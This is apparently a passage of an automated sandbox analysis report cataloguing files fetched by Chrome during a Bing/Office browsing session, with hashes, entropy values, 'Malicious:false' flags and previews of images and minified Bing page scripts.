                                                                                                    Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....sG9..h.y..0}i(...s@.Q@..q...M..k....6aD....8.H....i...o[8.-.)..#...o.J..m..,}O......\..1.......?..0b....<y..$..r...z.....r..lp....{.....z..ri.}}.k.V..)..2Os..z...-^mQ.A..H,9.m.7CF..L...K....*.1..<<.;..>..2..d.vE..5...0*..n...H...>..c..L<.....Zp...w...9Um.{tp..B....UWU..W..j.#.`..K`.....].'.]@.lrkb..4.cX.C......u<.....I..#Y..H...G....g....TzVu.h.g*...Kq.<j
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):226
                                                                                                    Entropy (8bit):4.923112772413901
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:2LGfGIEW65JcYCgfkF2/WHRMB58IIR/QxbM76Bhl:2RWIyYCwk4/EMB5ZccbM+B/
                                                                                                    MD5:A5363C37B617D36DFD6D25BFB89CA56B
                                                                                                    SHA1:31682AFCE628850B8CB31FAA8E9C4C5EC9EBB957
                                                                                                    SHA-256:8B4D85985E62C264C03C88B31E68DBABDCC9BD42F40032A43800902261FF373F
                                                                                                    SHA-512:E70F996B09E9FA94BA32F83B7AA348DC3A912146F21F9F7A7B5DEEA0F68CF81723AB4FEDF1BA12B46AA4591758339F752A4EBA11539BEB16E0E34AD7EC946763
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/MWgq_OYohQuMsx-qjpxMXsnruVc.js
                                                                                                    Preview:(function(n,t,i){if(t){var r=!1,f=function(){r||(r=!0,typeof wlc!="undefined"&&wlc(sj_evt,sj_cook.set,wlc_t))},u=function(){setTimeout(f,t)};n.bind("onP1",function(){i?n.bind("aad:signedout",u):u()},1)}})(sj_evt,wlc_d,wlc_wfa)
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 2609 x 470, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):713010
                                                                                                    Entropy (8bit):7.987989282294461
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:U/c+B7hHsXoxmtGQolRbB//k45VaX4P1g+7TX9r4FYyPxquW5:UFhOoeGQwRbB08E4P1gqN4FfP4uW5
                                                                                                    MD5:FA4FE5B56D9FAB46DB542559A3B83E37
                                                                                                    SHA1:87921556BC7E350DEF09A7CBC51465C52383428D
                                                                                                    SHA-256:9872BD2450803A2A52E862DE35CA6FA5F1684AC59174F73C7F80EADFC0B63002
                                                                                                    SHA-512:8E58F7075D015C0280DCF0845A4FD84498E738EA57232E56A152336B611E2681EFB19C5824A31203E84B92E0355AFBE2447AD3CF76AABA1B3DA431471DB4D8D4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR...1.........<.9.....pHYs.................sRGB.........gAMA......a.....IDATx..O.uGr.Vu(K.lS$1..b.0.. ."..."..|.d.u..*..,.d1...o...0...I...XY.Z.0....Hp..-K...._W...>............}...[.t..._....bfBdp.e..G)-.z...jT....v.62.rxo/.Z.U...t....6~.>.x..<.8.....-.....+.{.3.7..6..g.....4.....Z..;...Y..X/..yC...4....}..Jn.".ej.W<Sn#.3.......o.K.?/.d.C)_.....'...,.P.P.8o.f.+.?....Mu`..u.y.1..A..d..$y;a|b.Ve.....,oWr.....{....\.U.2.j..4=...?c^.Z......z)....${M>+Yb^.Y.r....0...8N.../[.7.x#.{....+..<...yQF..i.s...._E.JV.a..wY..T.6n>N..-l...=..G^.g.=.Om.r..B=.|.y.[..[.........u...~...g........._...Ch.;..m#..<.)._..................i..u.......).....=..Lk.v.....N..._.U...._.f..r........_.................L.7N...........v.........?...z..U.....;..........?.G.HnW.W.oy~...o.9..g..g......]..........G..o..V......o..F.}..Q........._}..~...v.g*....'.|b.y....M.6m.i.M.6m..{$..tj..>.L?..S.c..w..~../..B?...TF.:..>...'?.....-|.=.M......?my.{.=Y.....w.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:08:01 11:40:12], progressive, precision 8, 160x160, components 3
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):6817
                                                                                                    Entropy (8bit):7.859219052464007
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:sO4w46jQPjxS2VUxVMkjqHqHfGaOUE37ri:sO346jojxR0WKHfoe
                                                                                                    MD5:0C41EE31B04E978B4882D17690F03A3A
                                                                                                    SHA1:1890E62ABDFF4D2DD0A66E8A10BF5429440A50EE
                                                                                                    SHA-256:97785743A5FFC303FF8B7B465CD12AF8403F7EED2B2D19687E118E2621059741
                                                                                                    SHA-512:88555E4C500A6B416E8A8E783497B1F6925EEAF708991080E3776757102D9D522CA4830CE924ACA23EC55C579AAC5CFCA7116343236FE8BF8A13FB2DFBD104AD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/GJDmKr3_TS3Qpm6KEL9UKUQKUO4.jpg
                                                                                                    Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:08:01 11:40:12....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;...........................................................................................!e."E.T....!......S-C`!..bB.e.J2.z..:<....9.=.[....... .l..Rwy...X..s..u....!.a gNe..+......r...!..-8ZX%..!.e..e../.]..e.vk.R0._;.|..<hE...l..i..,.s.Ec.e.G..T....|.s..K..............+.|.q.=..1*r..$vSb..^q.(hk/..w8...;.v..p:.....C.k.....q.(.M..M.....}q.r+...N.....#.xK.O.....Ci.S=s...}ea[..>MC4.zN;w.Z.%...g.....jo:.g..L.7.......K3...oa.}.=3.<No.|*l..q...#Iszt.z..g..%...z..m.....q....t.L%.\Xc..r:.a...........*s{.A..=.z%.W....y}}..W..2......*^..s..^...R.$..K..E'M........c.[..Buhvu....H...7N.=...o|...Z[\.:.=..3.......jP...k....p.....r. ...!R.z2....*`T.......H.*k,..`.@..$P@G...(....
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 1037 x 807, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):454211
                                                                                                    Entropy (8bit):7.990991479839813
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:12288:2YIEcwyZJePwC+T+nOpGqxWwuoyTvtkz124TdyKd:5TqDBBAUEY1HHd
                                                                                                    MD5:40F76B47F614919A109A3E36E611B55F
                                                                                                    SHA1:161E1B199DA787D63485E2C0D0B2EAFCAF0A60E8
                                                                                                    SHA-256:0577A7A47D06A9385C6BF2A52E5B5646B73B2A331B31F016EEADC7308370F753
                                                                                                    SHA-512:98F92FAF568AA1F03B8DDD4493DA52E8B095FA3AB518F0B6A606CD423A12D8AB51AA9453211CF10844787A1BFC146E3485A1CF940FB7D73C63B71CC2130B79C5
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/highlight-commercial-3-mreb-40f76b47f6.png
                                                                                                    Preview:.PNG........IHDR.......'.....U.3....pHYs.........&.:4....sRGB.........gAMA......a.....IDATx.....$.u......u.k;.=..0.o...h."..Q\R|Z..R.....{.....Oz..J+i..OK.2.$..H..a......7......[.*.s"#+23..n.@"....[...ddVu..9q.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................[...........V.U......APZ.k....G.d.0..6.Agc8(v..Zg......g.x:."...............;.N4........}.k7..q.......|.Z./....`6.E.....E.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (891), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):891
                                                                                                    Entropy (8bit):5.1332488883366585
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:2QG5MCVFmMCBTotKMCWqEZWMCUHK09nzEIzGln:GbGb+Eb5EgbCr9nz+ln
                                                                                                    MD5:02B0B245D09DC56BBE4F1A9F1425AC35
                                                                                                    SHA1:868259C7DC5175A9CC1E2EC835F3D9B4BD3F5673
                                                                                                    SHA-256:62991181637343332D7B105A605AB69D70D1256092355CFC4359BEE7BDBFB9C6
                                                                                                    SHA-512:CBB43000A142807FF1BB3BFAC715CEF1240233117C728F357C824CE65B06BE493DF2306C7B03598817F09B02E9E36EC52314F88467679C5BEF3EE1504A10C7E6
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:(function(){function e(){var t,r;n&&(n.value.length>0?(t=Lib===null||Lib===void 0?void 0:Lib.CssClass)===null||t===void 0?void 0:t.add(sj_b,i):(r=Lib===null||Lib===void 0?void 0:Lib.CssClass)===null||r===void 0?void 0:r.remove(sj_b,i))}function o(t){var e,o;n.value="";n.innerText="";u&&f&&(u.innerText="",f.classList.remove("nudgeVisible"));(e=Lib===null||Lib===void 0?void 0:Lib.CssClass)===null||e===void 0?void 0:e.remove(sj_b,i);sj_log("CI.XButton","Clicked","1");r&&((o=Lib===null||Lib===void 0?void 0:Lib.CssClass)===null||o===void 0?void 0:o.add(r,"b_focus"));n.focus();n.click();t&&(t.preventDefault(),t.stopPropagation())}var r=_ge("b_header"),n=_ge("sb_form_q"),t=_ge("sb_clt"),u=_qs(".qfc.b_searchbox .ghost"),f=_qs(".qfc.b_searchbox .nudge"),i="b_sbText";n&&t&&(sj_be(t,"click",o),sj_be(t,"keydown",function(n){var t=n.code||n.key;t==="Enter"&&o(n)}),sj_be(n,"keyup",e),e())})()
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):298
                                                                                                    Entropy (8bit):6.792615229750693
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6v/lhPKwCnFUJwf8RvG0dG9DsCJIWo+aAv+t8FvWwtbp:6v/7iwkFUJMyeHh1IX8S8Fue1
                                                                                                    MD5:0F21D94CE833C0F861617694D028CF0E
                                                                                                    SHA1:EC2639715E2031778BF874660461637EBD7BA368
                                                                                                    SHA-256:D1069BF1EEDFACE550CEC82F5C3954BCA0EA622D0BC792B173F2B1AB3D5EBFD6
                                                                                                    SHA-512:717BCF80BC5F2284EF27F97DED1E2228DCA5E7942B638EDAA7529E18F058D392277B990B182230272F393A349383660BF003E999D2C5DA3DCD8A7589C1D9E8D9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR... ... .....szz.....gAMA......a.....pHYs..........(J.....IDATXG..1..0......:...I...`...E."....V...(fiK .Wo.,.o../?.....'O.v>...z..($..@..........[&....NS..C..5.....@.X..fq...r.Q.z"Z7P..Yq...8[...f8Y...\..1.oFWh.......6(..=^.p=.........j.o.....$...@......./X.D.M.....IEND.B`.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4565
                                                                                                    Entropy (8bit):7.879534543139402
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:aSNKFuwJEQpaGX5wC3wglX5YEGdqsR1VsIAufA0E3xnMMV7:aSN3QpayvmEGdqsxsW7EhMMF
                                                                                                    MD5:D596565EC1F100A507CC0D5F663B6D57
                                                                                                    SHA1:6B688AA0541E5758B9A54C1848C6A52886E081BA
                                                                                                    SHA-256:4C8A06620DD3AADE66AEB759A5FC2BCEC1B51B66EA9C456B5DC3F511CB783258
                                                                                                    SHA-512:7E7CAF2644B686064959389EA975BC1701C8FB3FB23C44B701FE710227FE2A0A0B58769AABA6569FCBE1D79E44E5669CD60036060B3144E0C6B97A8C40D6CA9B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR.............J.......pHYs.................IDATx...t..u...H.$~X.....|L16.8@........`p.&.,..+.mPKh....4)$$.H..+Y....?SB.l.1..H!.4....c+..-k...cf.....Z.bZ......f..w.}.=.}...*...o....G.t%.?C...SOV.n..r!.t.<<.?.)..G......x...QA<... ..yxT..@w...Jkk..t:=....8....a.w..t)ux.v.......3TU}...........4.Z..@D.\...O.......<....\J).<......u.$..^.!.rfV.y},.[....a.....Q+..d...i...9..=..iU..S"ZY$[...&..1......9r"..........O.R..h..n..B...*X2..OD.,..n.4..]..k<.{..K..)...J.oB)...<.}>..6.o.~..X!.W..3s..,.<.Rj;DDg..........B\....;`..N...=1....L&.2...X,.z&m.)X1|.|9.`B.K`..K...u.K)7.o...CQ.9.|.C<....b......DD..] .\b....@0...d..s..X....0.S...2uuu.&..C.......O=..O..4-..+..ttt.+WV3......L......f.\..\......dr!.....[o.u_SSS...a.a..B....?.n.8.O.f.N...+....c}2O....p8.www..)b....D.........s4..~z..!.tQ...\........2{3X.o........OK$.'..}.M.f.8..c..DT....Kl.);\.=.;::d.2.v..RN.p..Bef.(.G.tz{<..QJ[.....1W.X1Y.1.....]......<....H.0&..~..y..(.E".wK..........G2.".L..
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (918), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):918
                                                                                                    Entropy (8bit):5.212381384143468
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:i2387E/Xv3qtMbKRgibYe9BqoGbKR7oGbY7oGbnewCY0ZWFU0fZy5c6MwQOR:dqtMbK7bLrGbKuGbjGbnXTWWSr5c6MwV
                                                                                                    MD5:341FC0ACD15DF6D8A064E4C3A896F65D
                                                                                                    SHA1:1258FD48A874D80CB635BE454F9E4023A0DF7C49
                                                                                                    SHA-256:4BC6635D4D95F9C05A91904B19370A40CC6E4C2AB43661C00615EDDADEFCF9EB
                                                                                                    SHA-512:6B552D786E782C36F17BEE1A6AE204F1E8C9F85BE5EB9ADAC1793D60B537CAD13228CB2D4299949F051E6BC364C2E5A4105DE9BBF2885F492EDB425CB14CE982
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var KeyPressScroll;(function(){function i(i){var u=i.key,f=document.activeElement,r,e,o;document.querySelector("cib-serp[mode='conversation']")||document.querySelector(".b_selected")||typeof i.composedPath=="function"&&(r=i.composedPath(),r&&r[0]&&(r[0]instanceof HTMLInputElement||r[0]instanceof HTMLTextAreaElement))||i.ctrlKey||i.shiftKey||i.metaKey||i.altKey||!u||u.length!==1||u===" "||f instanceof HTMLInputElement||f instanceof HTMLTextAreaElement||f instanceof HTMLElement&&f.isContentEditable||(typeof sj_log=="function"&&sj_log("CI.KeyPressScroll","KeyBoard_Triggered",u),n.value="",t.scrollIntoView({behavior:"smooth"}),t.style.display="block",e=_ge("sb_form"),e&&Lib.CssClass.remove(e,"form_sb_hidden"),n.focus(),n.click(),o=n.value,n.setSelectionRange(o.length,o.length))}function r(){n&&t&&sj_be(document,"keydown",i,!0)}var n=_ge("sb_form_q"),t=_ge("b_header");r()})(KeyPressScroll||(KeyPressScroll={}))
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 2500 x 828, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1568713
                                                                                                    Entropy (8bit):7.994353727710284
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:24576:+SlEJttUZ+N7R8NrWZaF2sTAHPapdyjLLb7pFhO0+juu1nwdYAfnJ:+Qw8IcrSawsTMjLTpPj
                                                                                                    MD5:7BF078A5F39C15673178E3C77EBDFBCE
                                                                                                    SHA1:3FEAC213FCA05D4811FA705C60D726F5DC81B06D
                                                                                                    SHA-256:7C5FBD491C8E2916ACDB0955EC27F21E6C933860B33626FD1DED5486816BDD35
                                                                                                    SHA-512:CD621836F8420630E1A1A1B0F5BACDBFACB6C3FAC6CD9F93CF0500C5F3C05B8485C7CF0AF9CCE3F5025399FCC718EB0C8318C4E28174742D920D50022490FECE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR.......<.....s.1.....pHYs.................sRGB.........gAMA......a....^IDATx...Y.%Iz....1.i...s........@.8..}(RF3]Qf}...f4.Q...?A7.L...tA...e..%..I:.....Q...Du.9.yXcD....=.#..U...Px...k..<<<<<v.....B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 80x80, components 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1893
                                                                                                    Entropy (8bit):7.657822313014533
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ZokWiesoiQ+jWVA7QSMZW71TjnV7zLCziDTmpihTKRBsh7Xj4HzhIEtz6asmMaQx:ZoTsCVAURkvpCWPm2tMzhVtz6asmtW1
                                                                                                    MD5:0116F0FE3EDF5B6C93811615A3D151AD
                                                                                                    SHA1:4032664FA7BD21E3F95165E039168D49D0117F2C
                                                                                                    SHA-256:AE2C9DD42F670985B5B76DF08A1DCA3969F377D2E4E4ED4045B6A8B51E7F0BCB
                                                                                                    SHA-512:227CC728D495724FABE9089EEA6FA3BF156DF1340C23899999CB76AD779FA854895CFA6708DC5D0221460F57861B0BA814A9E38FA9626FFC96FC8D8974EB67ED
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:......JFIF...................................."....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............................"....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............P.P.."..................................................p\...&._....O.>.F+.~}.u......'.....Zhz.).R..QS.e]Bn$.k....I...Q..T..y..........................................5.*9t.{.M...sC.9..O...F.........................!..1A.T..."6U.......#2QRat.$BCq...%4Ss.............?.q....s.q(...7.#....G}o..p.....~...7.[...,.....<.g.....a..?ho....8Y.C}..Xy............}m......B.H..-..Nt4.&b@.cz..j. .....;.5..ug{5..ug;5..uw;5..uw;5..uw;5......[{.M....+b0;.....<..]......)..-.Z...OGH..$...h.n..B...4"...1..u...f.3.7.......;.~.;...Q.-(..s.A...P.*.. ....);.........2{.6^...{.:$.........~.|.....XT'|x*.yP.P..N.]l.TS.....O".P3.i.a..[a..*%d.A.&..^yj..J`.2O..8R.^iC.f.@..O..!H)...Fee.9M....!.H........r...22.Q..JH....[\.|S......q........cX6...k.R.....U.....0....}..-(.?Q.F.6....N............0...?.G..m3h.Xk.....i.c.3pu...m#YT
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (1060), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1060
                                                                                                    Entropy (8bit):5.351152776949957
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:2QmZ6qv3dhazSaxa7onMZN1GqPTz0KmNn4zVAoL3tMTCDU1nAA9zR9uHemdXp:2Om74MZN1tPv0KmNjAtMGD0zRPo
                                                                                                    MD5:F4DA106E481B3E221792289864C2D02A
                                                                                                    SHA1:D8BA5C1615A4A8ED8EE93C5C8E2EA0FB490A0994
                                                                                                    SHA-256:47CB84D180C1D6BA7578C379BDC396102043B31233544E25A5A6F738BB425AC9
                                                                                                    SHA-512:66518EE1B6C0DF613074E500A393E973844529CA81437C4BAFE6BF111CBA4D697AF4FE36B8D1B2AA9B25F3EB93CD76DF63ABFC3269AC7E9F87C5F28A3764008E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/2LpcFhWkqO2O6Txcji6g-0kKCZQ.js
                                                                                                    Preview:(function(){function t(t){typeof Log!==n&&typeof Log.Log!==n&&Log.Log("NcHeader","Rewards",t,!0)}function i(){var u,e,r,a,o,v,y,s,i,h;if(typeof bepcfg===n)t("bepcfg Undefined");else if(u=_ge("nc_iid"),u){var c=typeof bepcfg.wb!==n,l=typeof bepcfg.v!==n,f=u.getAttribute("_IG");if(f&&f.length||(f=_G.IG),e="&IID="+u.getAttribute("_iid")+"&IG="+f,l)try{sj_cook.get("")}catch(p){e+="&CID="+u.getAttribute("_cid")}r="/rewardsapp/ncheader?ver="+_G.AppVer+e;a=r;try{o=undefined;v=/(^|&)uncrunched=1(&|$)/i;o=v.exec(_w.location.search.substr(1));r=r+(o?"&uncrunched=1":"")}catch(w){r=a}y=_ge("rewardsEntryPoint");y&&(r="".concat(r,"&loadEntryPointsScript=1"));s=[_w.top,_w];i=sj_gx();i.open("POST",r,!0);i.setRequestHeader("Content-type","application/x-www-form-urlencoded");c&&(i.onreadystatechange=function(){i&&i.readyState==4&&i.status==200&&sj_appHTML(document.body,i.responseText)});h="wb="+(c?bepcfg.wb:"0");l&&(h+=";i="+(s[0]!==s[1].self?0:1)+";v="+bepcfg.v);i.send(h)}else t("nc_iid NotFound")}var
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (2830), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):2830
                                                                                                    Entropy (8bit):5.31085192538729
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:elqvTe8ACvq2VPzlSJNBIAj+9JpwdPcr7buUiAmiIQ8gZ8ku1U1jm:OqKQPzc77WM0SiIQ32ku1f
                                                                                                    MD5:6F04AE221F166C20DB32901998071D82
                                                                                                    SHA1:57B9AF43EE36E3FAEDA2A3A86E7636F36135D10B
                                                                                                    SHA-256:C5380FED2484297F0EDC88B0BA865A4B735D5637BF7854999FC6D5476AE1216D
                                                                                                    SHA-512:C75C37D3E8D3DAB1420646A07921C18A71E3C569F25F2CADBA81FA58CBC49803347DCDCA3E67BB0EA2B6E761829387453FC0C0AFDF847BBE84E290102555C4BF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/V7mvQ-424_rtoqOobnY282E10Qs.js
                                                                                                    Preview:var QuickBackRS_Ads_NoAjax;(function(){function s(){var n=_ge("b_results");n!=null&&(t=n.querySelectorAll(k),rt(),tt(),h(o)?sessionStorage.removeItem(o):(sessionStorage[i]&&sessionStorage.removeItem(i),sessionStorage[r]&&sessionStorage.removeItem(r)))}function nt(){var n="sschkad",t="sschvad",i;try{if(typeof Storage=="undefined"||typeof sessionStorage=="undefined"||(sessionStorage.setItem(n,t),i=sessionStorage.getItem(n),sessionStorage.removeItem(n),i!=t))return!1}catch(r){return!1}return!0}function tt(){var l,a,u,s;if(f=h(i),e=h(r),l=h(o),!l&&t&&f&&e){for(n=null,a=-1,u=0;u<t.length;u++)if(s=t[u].querySelector(c),s&&f==s.innerText&&e==u.toString()){n=t[u];a=u+1;break}n&&it()}}function it(){var h=document.getElementById("inline_rs"),p=_ge(v),w,b,l,s,k,y;if(!h||!p){a();return}if(t&&n){if(typeof ClickBackRSCustomControl!="undefined"&&!ClickBackRSCustomControl)for(w=n.offsetHeight-g,Lib.CssClass.add(n,"qbrs"),n.setAttribute("data-oAH",w+"px"),n.appendChild(h),Lib.CssClass.remove(h,"b_hide"
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:07:31 17:58:04], progressive, precision 8, 160x160, components 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4409
                                                                                                    Entropy (8bit):7.661436320849241
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:sZbhwhNizUZvpj+cq69L5CiYXL6UIwLxl3LeD:sWzj+cq615Te+Se
                                                                                                    MD5:A98A08BDB99B8422C9DC9D6FDD9387C3
                                                                                                    SHA1:967E5342AE802167DC06576E0E4FB96E76893296
                                                                                                    SHA-256:5FAB9EE214738E71D6C01392EBC7B1EEC09EF8E19CA508EF28154E3E7A769ACF
                                                                                                    SHA-512:660020F40078ADA6A3E3DB7B55063D3E3603F82CFBB3ACF81FE2DF53F23064414C78DAF8657C6E556ADCC4D2034EC077F8C0B4A7720018E457DAFDEEF0323476
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:07:31 17:58:04....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;.............................................................................................. (... ....@..........(.@..............(.................R. .......................f.....#x.....6.9.]...f.*...........|:......b...=....M}.}3/...H..{},k...x..`B.....z........y..9.yv.....9....>n...f...W......ug'.x..6:-3.a.iaHB.@.T.. .Q.@.)A.....At`..(..X!..0t).H...........s.uR6E.J.K9.@*.$.Es....&.........................!.. "A$10Bp.............o.wb.H2......p....H..m....ez.5.5....L.%.i....'..).s....$..q...E.....yxe-d<.VI...<s.~K....4.o.?.y.NY3r1..5...M9F..^Q...y..........>$.&r.g ..MK.qe....5.......~!.....\.&|....!5...`9.)F.R;.fY.%.&.={..R.A.....>.y....E.Q._....<.|_...J.....z&_
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                    Category:dropped
                                                                                                    Size (bytes):671
                                                                                                    Entropy (8bit):5.014579690661168
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:tbH4/KYf3UnlcWYl7qy/gk63xsV8tGXcqecDDWUV8jEPsycd23Wt+MKsAnueOc+d:t74LfEnTYpq+gTxs6GUUQEPssmYsAnuH
                                                                                                    MD5:D9ED1A42342F37695571419070F8E818
                                                                                                    SHA1:7DD559538B6D6F0F0D0D19BA1F7239056DFFBC2A
                                                                                                    SHA-256:0C1E2169110DD2B16F43A9BC2621B78CC55423D769B0716EDAA24F95E8C2E9FE
                                                                                                    SHA-512:67F0BC641D78D5C12671FDD418D541F70517C3CA72C7B4682E7CAC80ABE6730A60D7C3C9778095AAB02C1BA43C8DD4038F48A1A17DA6A5E6C5189B30CA19A115
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:<svg focusable="false" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... viewBox="0 0 16 16" enable-background="new 0 0 16 16" xml:space="preserve">..<path fill="#919191" d="M15.707,0.293c-0.391-0.391-1.024-0.391-1.415,0L7.994,6.591L1.696,0.293C1.298-0.091,0.665-0.08,0.281,0.318...c-0.375,0.388-0.375,1.003,0,1.391l6.298,6.298l-6.298,6.298c-0.384,0.398-0.373,1.031,0.025,1.415c0.388,0.375,1.003,0.375,1.391,0...l6.298-6.298l6.298,6.298c0.398,0.384,1.031,0.373,1.415-0.025c0.375-0.388,0.375-1.003,0-1.39L9.409,8.006l6.298-6.298...C16.098,1.317,16.098,0.684,15.707,0.293z"/>..<path fill="none" d="M0,0h16v16H0V0z"/>..</svg>..
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (4421), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4421
                                                                                                    Entropy (8bit):5.3588731850270666
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:E5WidfoUnKeG4DFKFnnQwiJUKhXLGajU/tx6:fidfLdG4DFKFQwiCKhXLGajU/a
